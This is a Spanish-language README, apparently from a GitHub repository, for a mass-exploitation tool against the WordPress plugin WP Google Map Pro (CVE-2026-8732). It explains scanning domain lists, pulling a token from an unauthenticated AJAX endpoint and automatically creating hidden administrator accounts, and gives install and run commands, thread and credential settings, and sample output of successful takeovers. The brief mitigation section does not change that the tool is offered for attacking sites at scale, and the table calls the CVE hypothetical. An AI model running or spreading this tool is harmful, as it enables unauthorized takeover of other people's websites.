
Esta herramienta explota CVE-2026-8732, una vulnerabilidad en el plugin WP Google Map Pro para WordPress. La vulnerabilidad permite a un atacante no autenticado obtener un wpmp_token válido a través de un endpoint AJAX (admin-ajax.php?action=wpgmp_temp_access_ajax). Usando este token, un atacante puede acceder al panel de administración de WordPress y crear un nuevo usuario administrador.
La herramienta realiza un escaneo masivo a partir de una lista de dominios, extrae el nonce y el token, y crea automáticamente una cuenta de administrador oculta en los sitios vulnerables. Los resultados se guardan en tiempo real con todos los detalles del token.
admin_created.txthttp:// y https://requestsInstala la librería requerida:
pip install requests
🚀 Instalación
git clone https://github.com/CVE-2026-8732-POC/CVE-2026-8732.git
cd CVE-2026-8732
🎯 Uso
Prepara un archivo con la lista de objetivos (un dominio por línea):
example.com
https://target-website.com
http://vulnerable-site.org
Ejecuta el escáner:
python2 exploit.py targets.txt
Archivos de salida
Archivo Contenido res.txt Dominios vulnerables con token completo y URL de redirección (si existe) admin_created.txt Credenciales de administrador creadas correctamente (dominio, usuario, contraseña, correo electrónico)
Salida de ejemplo
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ Configuración
Edita las siguientes variables dentro del script:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 Cómo Funciona
🛡️ Mitigación
· Actualiza WP Google Map Pro a la última versión parcheada. · Deshabilita la acción AJAX wpgmp_temp_access_ajax mediante código personalizado o un cortafuegos. · Usa un Cortafuegos de Aplicación Web (WAF) para bloquear solicitudes maliciosas a admin-ajax.php.
| Field | Value |
|---|
| CVE ID | CVE-2026-8732 (hypothetical for this plugin) |
| Affected Plugin | WP Google Map Pro (versions <= 1.5.0) |
| Vulnerability Type | Control de Acceso Roto / Escalada de Privilegios |
| Attack Vector | No autenticado, Remoto |
| Impact | Toma completa del sitio mediante la creación de una cuenta de administrador |